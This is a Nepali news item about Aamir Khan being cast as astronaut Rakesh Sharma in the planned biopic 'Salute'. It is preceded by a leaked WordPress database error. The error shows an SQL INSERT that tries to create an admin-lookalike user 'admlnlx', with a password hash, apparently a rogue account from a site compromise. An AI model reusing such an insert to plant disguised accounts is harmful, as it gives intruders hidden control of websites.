WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BAa5ErsWSBcohMGipYB1eN6eD/5tFK1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 06:25:08', '', 'admlnlx', 'admlnlx')
काठमाडौं, फागुन ६ –
आमिर खानले भारतका पहिलो अन्तरिक्षयात्री राकेश शर्माको बायोपिकमा मुख्य भूमिका निर्वाह गर्ने केही दिन पहिलेदेखि चर्चा चलिरहेको छ । चलचित्रको नाम ‘सेल्युट’ फाइनल गरिएको पनि बताइएको छ ।
फिल्मीबिट लेख्छ– यो खबरले आमिरका फ्यान उत्साहित छन् । ‘ठग्स अफ हिन्दुस्तान’ को काम सकेर आमिरले यो चलचित्रको काम सुरु गर्नेछन् । चलचित्रको विशेष कुरा अझ बाहिर आएको छ, यो चलचित्रका बारे एक–दुई वर्षदेखि नभएर ८ वर्ष अघिदेखि कुरा चलिरहेको छ ।
‘डेकन क्रनिकल’लाई अन्तर्वार्ता दिँदै राकेश शर्मा आफैँले चलचित्रको काम भइरहेको र चलचित्रमा आमिर खान फाइनल भइसकेको बताए । उनका अनुसार आमिरबाहेक अरू केही पनि फाइनल भएको छैन । स्क्रिप्ट पनि छैन । उनले भने, “यो बायोपिक निर्माण गर्ने बारे गत ८ वर्ष अघिदेखि कुरा भइरहेको छ । बीचमा चलचित्र निर्माता अन्य चलचित्रमा व्यस्त भए र म पनि आफ्नो काममा बिजी थिएँ तर अब फेरि सुरु गरिएको छ ।”
चलचित्रमा आमिर खान फाइनल भएका छन् । तर, बाँकी स्टारका बारेमा केही जानकारी छैन । अहिले स्क्रिप्ट पनि लक गरिसकिएको छैन । शर्मा भन्छन्, “मलाई थाहा छैन, मेरो जीवनको कुन हिस्सा चलचित्रमा देखाइने हो ।”